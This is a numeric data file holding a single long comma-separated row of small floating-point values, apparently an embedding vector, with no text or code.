2,0.009845918,-0.011601025,-0.012399678,0.032256294,-0.020841412,0.0117990235,-0.00044528162,0.007720422,0.009717719,0.0021129556,-0.011611855,-0.006329521,0.0079825325,-0.0009486208,0.015098315,0.03242657,-0.039479278,0.014176534,-0.0013743737,-0.014437698,-0.012028597,0.033670448,-0.0004726441,0.0023109023,0.027649952,0.027160287,-0.0046858396,0.018615583,0.034224145,0.042117648,-0.008979918,-0.010866752,0.006152416,0.001001744,-0.006241707,0.00595389,0.0032581543,0.001556752,0.0070566856,0.034530215,-0.015957927,0.0010736856,0.001852747,0.03763781,-0.026790436,-0.0014823392,-0.002277679,-0.013180348,0.04154488,0.0057945917,0.0756044,-0.0071521597,-0.026765527,0.0027677475,0.012308719,0.008413696,-0.012203727,-0.0028607366,-0.010395137,0.006218717,-0.010753428,0.033932295,0.013693675,0.027156107,-0.021184286,-0.0016796052,0.00012520808,0.01060667,-0.011617051,0.005721524,-0.0069554774,-0.00003178357,-0.008355241,-0.019000987,-0.011998999,0.02114356,0.03819454,-0.0048249904,-0.010689858,-0.023320578,-0.01749983,-0.0041229553,0.021311734,-0.0030308247,0.016806988,0.004176796,0.0073792282,0.0075321607,-0.019868823,0.039392576,-0.01993871,-0.006262584,-0.0068776123,0.013160505,0.03567501,-0.003529163,0.01163189,0.01849034,0.026936606,-0.0079821395,0.0014459388,0.027502425,0.004182574,-0.0011748086,-0.014965725,0.0051459167,0.016733093,0.013340328,-0.01712989,-0.0010105208,0.0009553805,-0.024789196,-0.03095049,-0.008802709,-0.009830951,0.0011186773,0.011345491,-0.003158626,-0.005466308,-0.022295527,-0.00067248684,0.028328164,-0.0077926028,-0.0067451987,0.014828254,0.029786874,-0.0025119996,0.0321378,0.0030839925,-0.0051073288,0.0024355266,0.025986895,-0.00012428669,-0.000935919,0.0067027877,-0.0018212314,0.0077493927,0.015562258,-0.0019380087,0.00087360165,0.0061268006,-0.0072824727,0.022784555,0.007597349,0.023246372,0.022133883,0.001515199,-0.016388783,-0.001061025,-0.0027879304,-0.015281655,-0.013107831,-0.028634235,0.034300566,-0.020237757,0.0021053455,0.006928945,-0.011592877,0.017084356,0.0036370067,0.020615814,-0.037622083,0.007986913,0.014278523,-0.0009876902,-0.020597866,0.034981698,0.013105069,-0.00690178,0.009106663,-0.009051181,-0.027407229,0.0045764986,-0.009791778,0.009213343,0.0052040587,-0.008438749,-0.05305253,-0.0033616691,0.0017515869,-0.053917207,-0.030468937,0.03485371,0.0072702644,0.0047957404,-0.004494282,-0.006604894,0.00045133216,0.0019081854,0.0079107005,-0.036906123,0.0059637623,-0.002331351,-0.012882946,0.008608016,0.007234215,0.0016968487,-0.0070889844,-0.042201176,0.006646816,0.0014419153,0.011311887,-0.015742833,-0.0147560425,0.020607626,-0.003666866,0.027121235,-0.008146561,0.016822148,0.0067666173,0.026653761,0.0021037557,0.0035002483,0.0025302055,0.022646137,-0.016945966,0.014373707,0.011806934,0.048031203,0.0060521644,0.01738694,-0.002938009,-0.005632232,-0.009672606,-0.004784479,0.006901766,0.011727417,0.012783328,0.015843982,0.02635643,-0.0072823116,0.018792352,-0.002193191,0.018376647,-0.006884128,0.011900842,0.017466731,-0.0069918204,0.009279656,-0.013399629,0.008258546,-0.010860035,-0.020726755,-0.01423626,0.021129102,0.03726947,0.005523055,0.009037513,-0.0051955814,-0.0095048165,0.0046272194,0.020599112,-0.010879943,-0.018329354,-0.024602866,0.016047917,-0.026950577,-0.0009869289,-0.045558736,0.01649089,0.015787559,0.015873937,-0.021108119,0.00013366964,0.0020986872,0.0009696699,-0.01519162,-0.02694433,-0.025593778,-0.0134257935,0.025503673,-0.017576072,-0.0061424826,0.0058633084,-0.0061497935,0.0073030484,0.017051483,-0.018107075,-0.014312628,0.001122082,-0.006634949,0.021429112,0.029379128,0.008390698,0.00077623466,-0.012457256,-0.008456821,-0.0033576654,-0.018660383,0.01032308,-0.009367243,0.0140157845,0.022466645,-0.00065553543,-0.018001936,-0.015893823,-0.015908282,0.008722953,-0.035425358,-0.029065996,0.0077126515,0.006371049,0.0121612735,0.018453557,-0.024739016,0.011965734,0.017828293,-0.0073288674,0.0025124317,-0.01127098,-0.0026400397,0.031154562,0.029733928,-0.011711031,-0.03778269,-0.028839486,0.012282961,0.016271122,0.021787269,0.010672769,-0.012758801,-0.022176681,-0.028882261,0.0011177934,-0.0076426915,0.005282278,-0.0010556434,-0.03485641,0.036099557,-0.012725862,0.014032835,0.013572115,0.0055023786,0.017344203,-0.028778398,0.016201481,-0.019850072,-0.00999926,0.043931983,-0.009929233,0.010716064,0.021048909,-0.03086081,-0.023287307,-0.028912676,0.008024861,-0.016731134,0.006771216,0.0019384038,-0.0013124931,-0.015810953,0.0064126905,0.0011475667,0.023291815,-0.03163003,-0.009651801,-0.0042122523,-0.0140964985,0.029007228,0.019533591,-0.04240535,0.031205337,-0.023187552,-0.008929673,0.010225261,0.027363978,0.015785497,-0.008322577,0.0042087636,-0.009316399,-0.011070704,0.03210105,-0.0061603365,-0.009545051,0.036823373,0.0020465383,0.013723189,-0.004073989,-0.0069779074,-0.01613762,-0.007897206,0.012354715,-0.02006403,-0.0003900036,-0.005836835,-0.010686848,0.00620843,0.023702042,0.018318621,0.007501787,0.0012198873,0.031010523,0.017743966,-0.025097433,-0.008346294,0.00090205437,-0.008180079,0.0071999487,0.0008231708,0.010058619,0.013131652,0.02887476,0.0064144786,-0.005268229,0.009419616,-0.005848012,-0.00030611487,-0.011958838,0.02006818,-0.0068280245,-0.016256344,0.017003298,-0.017115336,0.0021925452,-0.010022781,-0.00008048191,0.009030567,-0.020405306,0.00009072871,-0.0031955116,0.012678163,0.02091065,-0.013454647,0.0056766216,0.002656055,0.011512284,-0.014679628,-0.008806306,0.019193057,0.0057032597,-0.001669256,0.0013188851,0.011895495,-0.013169679,0.012014832,-0.004448214,-0.007250451,0.0075454097,-0.005690147,-0.0040399926,0.007222299,-0.02262211,0.023567267,0.005715874,-0.009677463,0.00902678,-0.014717582,-0.043460157,-0.01425815,-0.0049714064,-0.02143763,-0.0047825007,-0.0015487806,0.025874969,-0.021207968,0.0009929577,-0.019245438,-0.074157886,0.017085155,-0.00870565,-0.010139304,-0.0012778261,-0.00181212,0.010223313,-0.0027593744,0.022290789,-0.01898684,0.0063768066,0.0016812372,0.008536784,0.017083392,0.0060255975,-0.010028495,-0.027840734,-0.0019249,0.014064597,0.005223835,0.015464138,-0.00017092489,0.0048340657,-0.002397804,0.03875734,-0.0037462125,-0.014223743,-0.006172404,-0.026647415,-0.01010312,0.006241172,0.017611407,-0.0062849526,-0.0010456113,-0.0031787448,-0.010616953,0.0073209,0.014964819,-0.014102604,0.0149387745,-0.0048761014,-0.013307364,-0.014327366,0.024148203,-0.030055942,-0.0040367823,0.004013883,-0.020154756,-0.00034903747,-0.015061775,0.02937374,-0.001093744,-0.0012316399,0.027453672,-0.0056678723,0.022206543,0.0030509382,0.023948286,0.027649783,0.0040299213,-0.00083778397,-0.0032956265,0.017758094,0.00470372,-0.021016171,-0.013644613,-0.025592666,0.03529374,-0.017363586,0.0035547,-0.0469049,-0.012516855,-0.019588979,-0.011474737,-0.013297909,0.013010364,-0.0080102,-0.018103354,-0.00829234,-0.01671335,-0.0114975935,0.010246035,-0.01882288,-0.008795929,-0.036455754,-0.017909998,0.0018721058,-0.009595707,-0.0066600116,-0.026182003,-0.02037179,0.018462997,-0.0038771566,0.018125832,-0.005391349,0.030357199,-0.0014568479,0.0010274587,-0.0020629007,0.002744616,0.021188542,-0.005363288,-0.0019577942,0.06259911,0.0049285977,0.0006318714,0.025021365,0.01620385,0.011255733,0.006097385,-0.024506856,0.011168129,0.000060878396,0.030065143,0.00907854,-0.018077847,-0.016430812,0.01509854,0.02610868,0.020597462,-0.003986287,-0.000799468,0.023811702,0.003411946,0.01959406,-0.0011011929,0.0077709765,-0.010595726,-0.018011507,0.010097676,-0.0067919027,0.01521198,0.019310698,-0.013756085,0.02130135,0.005101442,0.017084667,-0.030272651,-0.00986398,-0.0022787263,-0.009414627,0.0017206838,-0.019597236,0.014265602,0.006717271,-0.02063029,0.005181725,0.01918824,-0.01615011,0.020066816,-0.0012335146,-0.00068563333,-0.011836064,-0.01388361,-0.016857307,-0.0022749563,0.0070204046,-0.01686234,-0.0025692452,0.024700757,-0.0080696475,-0.016624205,0.012591781,0.0049215164,-0.044867493,-0.0009912865,-0.016506575,0.0056569637,-0.034348633,-0.009844462,-0.007653582,0.012240939,-0.004403162,0.04641271,-0.0076021296,-0.011473478,0.031505052,0.027136313,-0.00001786575,0.015679074,-0.009213355,0.03155454,0.0112610785,0.004939409,-0.011728356,-0.0010712589,-0.0013462547,-0.030509433,-0.0229207,0.0024571577,0.0010982762,-0.014424756,0.013537453,-0.005422653,-0.023550838,0.04617733,-0.01430328,0.022291243,0.0025589224,-0.017411351,0.0009966999,0.010493654,0.014888622,0.0179637,-0.012633008,0.009632623,0.0063809766,-0.03671199,-0.018079096,0.010287494,-0.0119622005,-0.0014506908,-0.011934123,-0.020550245,-0.010858624,-0.000294453,-0.012359514,0.016052878,0.010577215,-0.030547762,0.0136794895,0.014033125,0.015302188,0.0062976643,0.0010673862,-0.01099866,0.030541057,0.017813997,0.003244886,-0.0076807654,0.005338241,0.007945244,0.01944973,0.022282368,-0.020587394,-0.008022664,-0.02565099,0.009232977,0.0014236817,-0.032939,0.011046441,0.018176896,0.018830827,-0.008087248,0.0029499247,0.026220849,-0.007764913,-0.0047201263,0.0060871975,0.039368976,0.0013742036,0.011084158,0.01133641,0.0003983404,-0.009159379,-0.0066092103,-0.04118715,-0.019362975,-0.008238527,-0.009843125,-0.015661849,0.010238395,-0.01517258,-0.015211446,-0.0020183716,-0.0053693703,-0.0066364296,0.004329174,0.019233212,0.0024937687,-0.023854394,0.0029220837,0.0005542837,0.007864007,0.0012752711,0.0003206161,-0.0023060278,-0.027945852,0.004609382,0.006553772,0.011582555,-0.0027306925,0.0045418255,-0.040639635,0.02260603,0.01045035,0.014092909,-0.023276847,0.001709753,0.01794078,-0.016904421,-0.014817744,0.0043813963,0.00030755147,0.0026347267,-0.014041528,-0.012696373,-0.013849271,-0.0043467116,-0.017359786,0.075691335,-0.016432121,0.022225045,-0.024355903,0.013721492,-0.013546088,0.012363164,0.006606781,0.005061981,-0.019735442,-0.033856556,-0.021831188,-0.0024473702,-0.012532664,0.005702134,0.0047717285,-0.00029425294,-0.011500899,-0.014828942,0.00421753,0.00420514,-0.0073439386,0.009624056,-0.007289407,0.00778139,0.015790872,0.024514103,-0.007940048,0.010765477,0.0017930845,0.0028871915,-0.014161949,0.022638474,0.00015918272,-0.001081994,0.0009997492,0.019393817,-0.013504238,-0.0057836515,0.019787906,0.0025624235,-0.02736573,0.021860477,0.0196349,0.009858494,-0.013156406,-0.0077819214,-0.0021718242,0.00557009,-0.015475712,-0.007988401,-0.0065695825,-0.010527859,0.0016486465,-0.013553915,0.008366163,-0.013166384,0.017705048,0.013569346,0.0013494872,0.0056123473,0.018947572,0.0026359204,-0.009204776,-0.010022002,-0.0062648193,0.021297658,-0.026672162,0.021362875,-0.008749481,0.009963312,-0.023873117,0.001994461,-0.008004534,-0.011074133,0.016013369,0.0046116114,-0.0118777035,-0.017456135,-0.030147165,-0.0077333064,-0.012279855,0.039231025,0.012519321,-0.016126208,0.015645472,-0.003939046,-0.009508921,0.068396814,0.0103324205,0.022258539,-0.012529572,0.004931562,0.036616087,0.013309215,0.021799538,-0.005319317,0.0016330997,-0.022600727,0.015974853,-0.004263081,-0.0005663696,0.0088428045,-0.019971035,0.014089389,-0.007989986,-0.0024650565,-0.0001359977,-0.013695775,0.020203056,0.028598808,0.026150368,0.003222348,0.016733654,-0.0137742255,-0.010947711,0.022580722,-0.0058347364,-0.009205182,-0.00063646486,0.013135029,-0.013713808,-0.012336062,-0.03730034,-0.000105641804,0.14675811,0.008673202,0.001989643,0.026190901,-0.0013712599,0.021323964,-0.102382585,0.0068554,0.005268625,-0.0070012175,0.0072178296,-0.008827141,-0.0013866988,0.021525819,0.008902148,-0.009598319,-0.008539887,-0.02271351,0.004070476,-0.010871753,-0.010788018,0.00006213744,-0.010062649,0.009581637,-0.027926238,-0.0049586357,0.003163172,-0.0028826063,-0.0066590933,-0.022736775,0.0062537496,-0.014304949,0.00858461,-0.015701305,-0.028146919,0.016323468,0.023384698,-0.009679763,-0.0045143883,0.00010514904,0.018301254,0.018500393,-0.011214242,-0.03536815,-0.14431015,0.00813471,-0.0069174496,-0.03311348,0.017209282,-0.0128791155,-0.012677063,-0.0030696904,0.032850653,0.0023816018,-0.018028043,0.009606649,-0.013968689,0.026907254,-0.028422832,0.012481519,-0.0030447647,0.00017301724,0.0055434327,0.00065542845,0.005016659,-0.0035204336,-0.017094677,-0.03722294,-0.021983448,0.0032747956,0.01262617,0.030468378,-0.0110757025,-0.0103216255,-0.012566667,0.008849004,-0.01608769,0.008077705,-0.0054048225,-0.029207656,-0.021913026,0.014266218,-0.017451126,0.029809464,-0.032930482,0.0017725124,-0.010054823,-0.0026777317,0.0022176313,0.0042540203,0.014676299,0.02756929,0.019210089,0.0026953428,0.007884664,-0.009079059,-0.021541892,0.0070345383,-0.00053033495,0.001171073,0.0070069106,-0.019885201,-0.008175851,0.0056667197,-0.013439453,-0.02206353,-0.022958836,-0.028625265,0.0365146,-0.0010437529,0.009698993,-0.041266493,-0.004899236,0.016813202,-0.008989825,0.008104887,0.007404268,-0.010604236,0.03716147,0.00198825,-0.0167316,-0.0010638086,0.007282785,-0.017712802,0.011226881,-0.009179159,-0.004777961,-0.004409577,0.0057421844,-0.0053583733,-0.01825182,0.017476728,-0.0123012895,-0.019542802,0.024816234,-0.011832149,0.018894367,-0.008939482,0.0073264893,0.0036889978,0.037455194,0.00119928,-0.01221307,0.017015016,0.0075486307,-0.010092669,-0.0077648107,0.0027626562,-0.007106287,0.00758032,-0.008815635,-0.014249868,-0.018019749,-0.00050253,-0.015567216,-0.014780432,0.0026569625,-0.005909787,-0.02720287,-0.008464104,-0.00030674195,-0.011071095,0.014765841,0.013135045,-0.02636229,0.007947596,-0.004717894,0.013860147,0.030327577,0.03135138,-0.025914818,-0.016788188,-0.015287833,0.01815235,-0.027820785,0.00058753474,-0.0068053976,-0.016104711,-0.008608778,0.013024765,-0.005367747,-0.0028875526,-0.044634614,0.0018000735,-0.005163699,-0.004843922,-0.015770216,0.0008430123,0.0019909868,-0.02799936,0.040704064,0.001502323,0.026360212,-0.0117054675,0.004165615,0.020975579,-0.0149096465,-0.033341542,0.025823876,0.06039907,-0.008794252,-0.022779465,0.0036142303,-0.011489865,0.00081418065,0.028202355,-0.01822969,-0.020567445,-0.012758042,-0.015827581,0.0024023405,-0.010861613,-0.011156313,-0.019460758,0.015877118,0.009342344,-0.00033064582,0.0051980936,-0.00077187916,0.02587285,-0.024039896,-0.0008433652,0.012754213,0.021275802,0.002416481,0.031054074,0.0100566745,0.0045199366,0.0052709747,-0.014175532,-0.016272899,-0.007410874,0.0098968195,0.0053532226,-0.024654059,-0.011392096,-0.0047321715,0.0042938637,-0.017410418,0.0038264177,0.034783196,0.019393915,-0.017599538,0.012892602,-0.020308867,-0.027174542,-0.008687357,0.01328614,-0.012691924,-0.00091901206,0.00896965,0.0016608491,-0.020152854,-0.0053231814,-0.0039021394,-0.008396002,-0.019935623,-0.0061230743,-0.019739397,0.020434124,-0.01459815,-0.0095210895,0.0062652943,-0.0150237465,-0.013128847,0.0035672921,-0.0076347277,0.0012047886,0.02011865,-0.01903637,0.0035549076,-0.029547598,-0.0039490904,-0.0090999575,-0.004243733,-0.009107686,-0.0063033854,-0.009014049,0.025120575,0.0023434616,0.0094949,0.006719472,-0.0023478218,-0.033026572,-0.044610377,-0.0119132,0.040940467,-0.003961199,-0.0047843824,0.00963144,0.0026777585,0.008855784,0.0069725267,0.02338168,0.0009917272,0.025840767,0.0129839545,0.019155243,-0.0020046574,0.0020759613,0.017516173,0.0025222886,-0.01649839,-0.0060959174,-0.010688408,0.01660296,-0.01813743,0.018670378,-0.018785823,0.004360852,-0.02854919,0.013798861,-0.02210964,-0.011330759,0.041543234,0.0017245925,0.008403459,0.017413814,0.008230932,-0.0057518207,0.023738984,0.008503581,-0.011751741,0.0043024295,-0.021373065,0.012340709,0.008830252,-0.015263265,0.018052826,0.004978643,0.043837488,0.000088495115,-0.008380621,-0.013711062,0.012739254,0.012495477,0.00008813543,-0.0043608313,0.030182078,-0.031357363,-0.0060171233,-0.000022275737,-0.001964593,-0.0010033255,0.0031465923,0.006976265,-0.008876641,-0.029235827,-0.0014621544,-0.011168735,0.01694681,-0.0089023905,0.015741087,0.019356284,-0.003241815,-0.002379591,-0.02107635,-0.0023458903,0.00470032,0.0014247663,0.0183113,-0.010526632,0.02656042,-0.0030427359,0.029474692,0.041539337,0.0074604442,0.02954743,0.0014919253,-0.0063060187,-0.008532608,0.027285611,0.0036527938,0.014855007,-0.000019280593,0.013905899,0.013492263,-0.021615041,-0.026839094,0.008335243,0.013876787,0.0030810996,0.0053204075,0.0012412507,0.0013596086,0.0021472804,0.036027953,-0.013148289,0.01605508,-0.023938183,-0.007042777,-0.0016901331,-0.0065764347,0.0077255955,-0.006626952,0.009771596,-0.02968816,0.005047772,0.0103211375,0.02362041,0.035510793,-0.012519282,-0.0063601905,-0.007097537,-0.0066294596,-0.011283326,-0.008988424,0.007294958,-0.0069853207,-0.004754062,0.0024311002,0.0046518566,0.0013610852,-0.023562197,-0.014194852,0.0011595638,0.02500504,0.0013208343,-0.027004281,0.012390369,-0.011888178,-0.0019293372,-0.00046617514,0.003359756,0.0047490443,-0.026396384,0.052357342,-0.022273436,-0.00086759246,-0.01564104,0.03254486,0.022775209,-0.009899535,0.0042716805,-0.007117017,-0.015558014,-0.0023342734,-0.03644418,0.013942829,0.008892129,-0.016193101,-0.025392044,0.023319477,0.008690434,-0.017570583,-0.0018607596,0.019537725,-0.016821291,0.0342322,-0.0043603037,-0.01702815,-0.058349885,-0.010423514,0.0022580822,-0.030908119,0.006443954,0.019092461,-0.016317727,-0.008477708,0.0009402717,-0.0153711485,0.018852098,-0.00822367,0.015999712,0.005702107,-0.0024385487,0.018924983,0.00030991557,-0.004473558,-0.001303155,-0.021721778,-0.020457342,0.0063127475,0.008799311,0.0018553181,0.013856214,0.00042378923,0.012253899,0.020426493,0.014590697,-0.021501115,0.009396353,0.0035608306,-0.010376901,-0.008591338,-0.0008145252,0.005037068,-0.013353247,-0.031299468,-0.005920958,0.01686386,0.026633259,-0.013498899,0.0035695569,0.0042438894,0.0017459207,0.0012540981,0.008182372,0.011400979,0.016400738,-0.0018865829,-0.008703495,0.0041777636,-0.0043549463,0.009727832,0.034636304,-0.016343512,0.005756735,-0.008069031,-0.015074123,-0.004395418,0.029976994,0.00048747106,-0.0046691,-0.00017381928,0.0086044725,0.04330193,-0.009935965,0.02114475,0.0024833602,-0.0064778267,-0.0066151237,-0.005576197,-0.034634925,0.004088118,-0.0084707895,-0.028989425,0.015191779,-0.0034984369,-0.005438418,-0.014100614,-0.0018543374,-0.095599726,0.020520689,-0.007394045,-0.02209022,0.006312938,-0.020971214,0.008073224,0.037431758,-0.008151088,-0.051490676,-0.027602598,0.011427122,0.023569297,-0.02259898,0.0062003382,0.008030027,-0.026620628,-0.0038580038,0.01451893,0.025185116,0.009439865,-0.025932105,0.00074299006,-0.024058092,0.0031464898,0.004237937,-0.016445221,0.011550034,-0.0009836599,0.015406748,0.0053826924,0.0043826634,0.007370229,0.019709378,-0.008822694,-0.007802763,-0.009488751,0.0029403416,-0.0027069,0.00091925706,-0.0068040793,0.0023626965,0.016437653,-0.013748487,0.0112746125,-0.00007622188,0.011080509,0.014699348,0.010224946,0.02622087,-0.01553483,-0.0059266235,0.0056189406,-0.015333599,0.0032258308,-0.018408412,0.0009963193,-0.003380531,-0.006564818,-0.0035225481,-0.024993185,-0.0019370216,-0.00257477,-0.008396868,0.011392311,-0.0022458422,0.019688124,0.006956508,-0.039570976,0.01264774,-0.0065382947,0.017907202,-0.0037181687,0.0004895569,0.0067331293,0.01136399,0.0058828057,-0.0027395976,-0.020728426,0.020269599,-0.03500306,0.023087021,0.0013798412,0.02056276,0.007842338,-0.015493647,0.011124644,0.01023744,0.0015366876,0.0011600388,0.014962156,-0.0054516224,-0.010938317,-0.009860597,-0.024435245,0.0063476227,-0.010665173,0.010661001,-0.0053853462,-0.017767549,0.004185039,0.0031252236,-0.01144313,-0.013433041,-0.11343932,-0.042101882,0.019147478,-0.0059982366,0.012469323,-0.008788004,0.021323387,-0.005261323,0.033602014,-0.0027138826,-0.0026023355,0.0080947615,-0.030392194,-0.0048004813,0.019838454,0.00021426953,-0.032010917,0.00750605,0.0074323555,-0.023000369,0.0011414842,-0.019934611,-0.0010837128,0.008593683,-0.0012962561,0.016767906,0.0018773141,0.03895071,0.0023081,-0.0152305085,-0.0005298059,0.010251927,-0.008100894,0.009953619,-0.041800514,0.0004788434,0.0008132519,-0.008497982,0.007565593,-0.0018707217,0.0017808164,0.010969164,-0.009185397,-0.0013948568,-0.0026709868,0.0034374578,-0.017654171,0.023308296,-0.002769978,-0.0019687652,0.017338416,-0.017423624,-0.00044465164,-0.017056413,-0.026000053,-0.017948015,0.007963648,0.028926568,-0.001869766,0.0056014596,-0.0124041345,0.014359675,-0.028785419,0.0025400538,-0.0077684396,0.019393312,0.00061527727,0.015379674,0.004738984,0.01539209,-0.010986756,0.037523646,0.018056994,-0.00088842877,0.02646787,0.0011612092,-0.0011816128,0.036804333,-0.00089047826,0.014016529,-0.0038857143,-0.03621551,0.0033044263,0.019714491,-0.03506766,0.022994239,-0.0017498248,-0.013420124,-0.033935204,0.0015043443,0.018045992,0.020799072,0.003929628,0.028158028,0.003011172,0.015957536,0.07581069,0.015148979,-0.010130493,0.0069914283,-0.018542215,-0.00869831,0.0016694746,-0.011410881,-0.025264816,0.035883535,0.020298852,-0.0017745591,-0.0012205136,0.0141659435,0.0007233997,0.018140629,-0.016354058,0.014364747,0.0014443304,0.006403337,-0.0098444,0.0075753396,0.0060138367,-0.0046950774,0.024839489,0.016698008,0.00535209,-0.019993521,0.007701418,-0.015091018,-0.014348775,0.02438965,0.009765108,-0.0100749275,-0.006175548,-0.008769793,0.02484496,-0.019274252,0.007193858,0.005239865,-0.007823313,0.006204403,0.0009029808,0.0029510204,0.003081394,0.0067007183,-0.0063987267,-0.0059811478,0.014531071,0.008058716,-0.017768947,-0.026420197,-0.0051699365,0.016121043,0.0038269765,-0.0046141045,0.036069322,0.008809149,0.009905718,-0.0030299544,-0.0038064553,0.0010018371,-0.0008173219,0.01920045,0.0009627799,0.025254011,0.025859797,0.016498167,0.0011826581,-0.0066307765,-0.0021430862,0.018265959,-0.024243252,0.0032876362,-0.008674008,-0.00068647147,0.0035762927,-0.06050053,-0.0009470992,0.0012318915,0.014291308,0.01788967,0.00886713,0.0125182485,0.0064990884,-0.011878692,-0.011155276,0.004456232,0.006938616,0.020441553,-0.016122019,-0.01113285,-0.023076726,0.0013730812,0.024214106,0.01966635,-0.013270504,-0.014994771,0.019309752,-0.0021314484,0.0018264669,0.0020173134,0.0012879584,-0.013521528,-0.030197626,0.006481573,0.014662192,-0.021552293,0.026946094,-0.0016710549,-0.00035707772,0.026678842,0.004152844,-0.0054970747,-0.019419389,0.015322579,-0.026878063,-0.008510409,0.0007110535,0.020963425,-0.0027062867,-0.008702678,0.032112278,0.0005766008,-0.00957283,-0.011157524,0.007716022,-0.007399325,-0.014205816,0.029166413,0.009753932,0.020490743,-0.024119355,-0.02199005,0.009880677,0.016454203,-0.018351438,0.011408828,-0.0021555033,-0.011939104,0.019118823,0.017896662,0.009570703,-0.013003515,0.01625486,0.024856687,0.031463537,0.02488485,0.028339412,0.0032495144,0.013164508,-0.0022159892,0.021025978,0.036076438,0.009260468,-0.013861893,-0.008909019,-0.0107104005,0.012820832,-0.009903576,0.00688951,0.0138736265,-0.007602562,0.014905042,-0.027171403,-0.006273893,-0.02194522,-0.011037505,-0.0026864633,0.010244482,-0.00059622905,-0.02358651,-0.00503779,-0.01173283,0.0071765957,0.0037130436,0.006502526,0.020691857,-0.018164134,-0.012776351,0.004513172,-0.024011603,0.018544167,0.005954408,-0.0030761457,-0.0033746616,-0.031374868,0.012335156,-0.008381052,0.026640438,0.013265073,-0.0009249204,-0.00012116606,-0.017547995,0.011454034,-0.013399043,-0.0042964765,-0.0017491109,-0.00059088646,-0.007545571,0.0059525254,-0.012893279,-0.012755261,0.0063602235,0.009886734,-0.011170631,-0.01972476,-0.013542809,0.010603871,-0.0050209556,-0.010964739,0.01467849,0.0037781978,0.0042430046,-0.0101143,0.016308228,-0.0022342596,0.015993252,-0.0101591,0.0037925749,0.021794725,-0.018632507,-0.049014237,-0.006929858,-0.005375392,-0.022010442,0.028700756,-0.01993839,0.0021895813,-0.0032132703,0.015388567,0.03422035,-0.004483453,-0.0029572125,0.029146206,-0.0072440505,-0.020606788,-0.010274746,0.021350475,0.0038615866,0.0037108872,0.0326426,-0.018805934,0.01283553,-0.0043292195,-0.0064866827,-0.002890666,-0.0085424045,0.007057345,0.024966568,-0.0010231206,-0.0009764223,-0.00059200637,0.004543894,0.025422888,-0.00362472,-0.010387431,-0.018192764,-0.011933693,0.02943769,-0.04776678,0.0064846887,0.011842396,0.015451448,-0.022965144,0.006446717,-0.010413553,0.007813557,0.002474859,-0.0075135836,-0.020416846,0.024954095,-0.023851218,0.01492925,-0.00503294,0.01322983,-0.025709938,-0.028012563,-0.015416256,-0.09228628,0.0014863511,0.016223487,0.006104969,0.02002133,0.0041157417,-0.010170032,-0.01917415,0.0011114787,0.033244263,0.0038327249,-0.018096397,-0.003825243,0.0063996115,0.018593758,-0.0015198238,0.000099839104,0.0064604124,0.0003025185,-0.022357816,0.012605919,0.0029124343,-0.014612996,-0.009864009,0.02191136,0.012504936,0.0033491016,-0.011431685,-0.0024820855,-0.0028789102,-0.008593738,-0.0016054484,-0.008553504,-0.0011214141,-0.011046758,0.023202537,0.0054758275,0.017364835,-0.004246407,-0.016017247,-0.0008787144,0.011492791,0.0063106823,0.0034228668,-0.016421808,0.012924091,-0.03252783,-0.0071214503,0.0010903198,0.006227836,-0.011791851,0.011676231,0.021047063,0.026761668,-0.005935185,0.011694216,0.0017314882,-0.020577969,0.03648115,0.000821059,0.001758609,0.011374104,0.004606005,0.006464798,-0.0057168123,0.0017279566,0.0042024157,0.0038344013,-0.023094792,0.0052005397,0.0069955257,-0.014199306,-0.01383947,-0.008320918,0.008742774,0.026389342,0.0008317927,-0.011060414,-0.018297479,-0.0123222,0.032301173,-0.00090237893,0.020912608,-0.0012178043,0.007972033,-0.0014022705,0.011497584,0.0063980646,0.0034979824,-0.0022822209,-0.018606966,-0.0095032295,0.020741398,0.0020393077,0.0074370587,-0.00048202364,-0.021698965,-0.0022325744,-0.021084275,0.02019771,-0.00261528,0.00587758,-0.0040738517,0.00023830465,-0.011719727,-0.0068929675,-0.00023876292,-0.0055475137,-0.006843324,-0.0027164023,-0.010382355,0.022330407,0.050550863,0.023118887,0.009470649,0.00697439,-0.0028092524,0.0071098316,-0.017895041,-0.035420507,-0.017222503,0.0070025288,-0.0130685605,0.029059302,0.012433649,0.0064885453,-0.0018665586,-0.019657852,-0.013624643,0.019450089,0.0029990885,0.020757783,-0.0038532973,0.017092695,-0.023381043,0.009688845,-0.007079227,0.017137041,0.002317959,0.008779362,-0.0084577445,-0.012232412,0.011679589,-0.015425875,-0.021713456,0.029887842,-0.0011312881,-0.0013657756,0.0095441975,-0.017302524,-0.004812111,0.0077926824,-0.0064235055,-0.013157662,0.003766275,0.00686169,0.007558163,-0.0041961716,-0.009940722,-0.007112712,0.007238639,0.027943168,-0.01519802,-0.007814925,-0.037154302,0.01529926,-0.0021389436,0.02018076,-0.01842738,0.0018610923,-0.0077296156,-0.007874129,-0.0018146479,-0.019350685,-0.033633016,-0.007715416,0.02823385,0.02743766,0.002001813,-0.00371496,-0.024038838,0.004624894,0.00049075985,-0.011070442,0.006513302,-0.017757177,-0.003075537,-0.0054654023,0.016904444,-0.0145461215,-0.016223824,-0.006797455,-0.0038948557,-0.0057256296,0.0007066257,-0.009431003,0.0022505312,-0.009182229,-0.012005779,0.0176137,-0.013231374,0.013381273,-0.008156957,0.010972129,0.027682537,0.00862897,-0.00789796,0.025421016,-0.03353072,0.0012383694,-0.0071154884,0.00961311,0.010282945,0.12261473,-0.004206878,0.0017059982,-0.0012143616,0.0017381347,-0.0017911936,0.006112756,-0.004065155,-0.008473844,0.005292355,0.02022661,0.0013587266,0.022773987,-0.0018419111,-0.013700011,0.024355518,0.010047369,-0.009863996,0.035176728,0.01325494,0.0060842154,-0.024302222,-0.016811,-0.05004689,-0.024481272,-0.080402836,0.0372565,0.0151708545,-0.008356186,0.029036533,0.00814118,-0.009750289,0.016056377,0.015845796,-0.01389851,0.008666632,0.00037969882,-0.023487436,0.021304797,-0.007363525,-0.0001453761,0.0013478172,0.0069535994,-0.020074438,-0.022792414,-0.010119073,0.003881054,-0.004845109,-0.0051954533,-0.01922941,-0.0030523918,0.007347911,0.0020019414,-0.009981897,-0.001683841,-0.019637328,-0.0025260001,-0.00808079,0.03171904,-0.0055322996,0.015080425,0.0006922591,-0.00036104245,0.00053891825,0.0052372655,-0.009544653,-0.018391754,-0.009715497,-0.0029170655,0.015880642,0.009278079,-0.0015145686,-0.0038391172,-0.010006603,0.008649057,0.015963418,-0.009818115,-0.017746665,0.0011519709,-0.008642581,0.010501406,-0.0031821865,0.020010592,0.004789401,0.0006089559,-0.009107321,0.0076416405,0.008339277,-0.0037876244,0.0017685608,0.010225673,0.008425802,0.02314123,0.035940412,-0.0105293,0.014451425,0.025445666,-0.0069756308,-0.02142015,0.007661